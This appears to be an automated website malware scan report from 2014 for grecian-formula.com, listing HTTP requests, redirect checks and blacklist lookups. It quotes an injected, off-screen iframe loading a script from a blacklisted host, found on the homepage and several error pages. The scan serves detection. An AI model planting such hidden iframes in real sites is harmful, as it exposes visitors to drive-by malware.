Scanned pages/files
Request | Server response | Status |
http://www.grecian-formula.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=0 Connection: close Date: Sun, 08 Jun 2014 00:20:21 GMT Location: http://grecian-formula.com/ Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 Expires: Sun, 08 Jun 2014 00:20:21 GMT | clean |
http://grecian-formula.com/ | 200 OK Content-Length: 4006 Content-Type: text/html | malicious |
Page code contains blacklisted domain: pilubas.com ...[1077 bytes skipped]... ="icon" href="/favicon.ico" type="image/x-icon"> <link rel="stylesheet" href="css/normalize.css"> <link rel="stylesheet" href="css/main.css"> <link href='http://fonts.googleapis.com/css?family=Lato:400,900' rel='stylesheet' type='text/css'> <script src="js/vendor/modernizr-2.6.2.min.js"></script> </head> <body><iframe src="http://pilubas.com/trackingcode/tracker.php" width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'></iframe> <!--[if lt IE 7]> <p class="browsehappy">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> to improve your experience.</p> <![endif]--> <!-- Add your site or application content her ...[3031 bytes skipped]... Malicious iFrame found. size: 640x480 src: http://pilubas.com/trackingcode/tracker.php This URL is marked by Google as suspicious <iframe src="http://pilubas.com/trackingcode/tracker.php" width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'> | ||
http://grecian-formula.com/js/vendor/modernizr-2.6.2.min.js | 200 OK Content-Length: 15414 Content-Type: application/javascript | clean |
http://www.grecian-formula.com//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=0 Connection: close Date: Sun, 08 Jun 2014 00:20:22 GMT Location: http://grecian-formula.com/ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js/ Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Content-Length: 293 Content-Type: text/html; charset=iso-8859-1 Expires: Sun, 08 Jun 2014 00:20:22 GMT | clean |
http://grecian-formula.com/ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js/ | 404 Not Found Content-Length: 4616 Content-Type: text/html | malicious |
Page code contains blacklisted domain: pilubas.com ...[3941 bytes skipped]... lor: #f8f8f8; } #goog-wm-qt:hover, #goog-wm-qt:focus { border-color: #105cb6; outline: 0; color: #222; } input::-moz-focus-inner { padding: 0; border: 0; } </style> </head> <body><iframe src="http://pilubas.com/trackingcode/tracker.php" width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'></iframe> <div class="container"> <h1>Not found <span>:(</span></h1> <p>Sorry, but the page you were trying to view does not exist.</p> <p>It looks like this was the result of either:</p> <ul> <li>a m ...[464 bytes skipped]... Malicious iFrame found. size: 640x480 src: http://pilubas.com/trackingcode/tracker.php This URL is marked by Google as suspicious <iframe src="http://pilubas.com/trackingcode/tracker.php" width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'> | ||
http://grecian-formula.com//linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js/ | 404 Not Found Content-Length: 4616 Content-Type: text/html | malicious |
Page code contains blacklisted domain: pilubas.com ...[3941 bytes skipped]... lor: #f8f8f8; } #goog-wm-qt:hover, #goog-wm-qt:focus { border-color: #105cb6; outline: 0; color: #222; } input::-moz-focus-inner { padding: 0; border: 0; } </style> </head> <body><iframe src="http://pilubas.com/trackingcode/tracker.php" width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'></iframe> <div class="container"> <h1>Not found <span>:(</span></h1> <p>Sorry, but the page you were trying to view does not exist.</p> <p>It looks like this was the result of either:</p> <ul> <li>a m ...[464 bytes skipped]... Malicious iFrame found. size: 640x480 src: http://pilubas.com/trackingcode/tracker.php This URL is marked by Google as suspicious <iframe src="http://pilubas.com/trackingcode/tracker.php" width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'> | ||
http://grecian-formula.com/test404page.js | 404 Not Found Content-Length: 4616 Content-Type: text/html | malicious |
Page code contains blacklisted domain: pilubas.com ...[3941 bytes skipped]... lor: #f8f8f8; } #goog-wm-qt:hover, #goog-wm-qt:focus { border-color: #105cb6; outline: 0; color: #222; } input::-moz-focus-inner { padding: 0; border: 0; } </style> </head> <body><iframe src="http://pilubas.com/trackingcode/tracker.php" width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'></iframe> <div class="container"> <h1>Not found <span>:(</span></h1> <p>Sorry, but the page you were trying to view does not exist.</p> <p>It looks like this was the result of either:</p> <ul> <li>a m ...[464 bytes skipped]... Malicious iFrame found. size: 640x480 src: http://pilubas.com/trackingcode/tracker.php This URL is marked by Google as suspicious <iframe src="http://pilubas.com/trackingcode/tracker.php" width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'> | ||
http://www.grecian-formula.com/js/plugins.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=0 Connection: close Date: Sun, 08 Jun 2014 00:20:24 GMT Location: http://grecian-formula.com/js/plugins.js Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Content-Length: 248 Content-Type: text/html; charset=iso-8859-1 Expires: Sun, 08 Jun 2014 00:20:24 GMT | clean |
http://grecian-formula.com/js/plugins.js | 200 OK Content-Length: 733 Content-Type: application/javascript | clean |
http://www.grecian-formula.com/js/main.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=0 Connection: close Date: Sun, 08 Jun 2014 00:20:25 GMT Location: http://grecian-formula.com/js/main.js Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Content-Length: 245 Content-Type: text/html; charset=iso-8859-1 Expires: Sun, 08 Jun 2014 00:20:25 GMT | clean |
http://grecian-formula.com/js/main.js | 200 OK Content-Length: 1 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: grecian-formula.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0
Connection: close
Date: Sun, 08 Jun 2014 00:20:21 GMT
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 4006
Content-Type: text/html; charset=utf-8
Expires: Sun, 08 Jun 2014 00:20:21 GMT
X-Powered-By: PHP/5.3.27
X-UA-Compatible: IE=edge
...4006 bytes of data.
GET / HTTP/1.1
Host: grecian-formula.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0
Connection: close
Date: Sun, 08 Jun 2014 00:20:21 GMT
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 4006
Content-Type: text/html; charset=utf-8
Expires: Sun, 08 Jun 2014 00:20:21 GMT
X-Powered-By: PHP/5.3.27
X-UA-Compatible: IE=edge
...4006 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: grecian-formula.com
Referer: http://www.google.com/search?q=grecian-formula.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: grecian-formula.com
Referer: http://www.google.com/search?q=grecian-formula.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=grecian-formula.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://grecian-formula.com/
Result: grecian-formula.com is not infected or malware details are not published yet.
Result: grecian-formula.com is not infected or malware details are not published yet.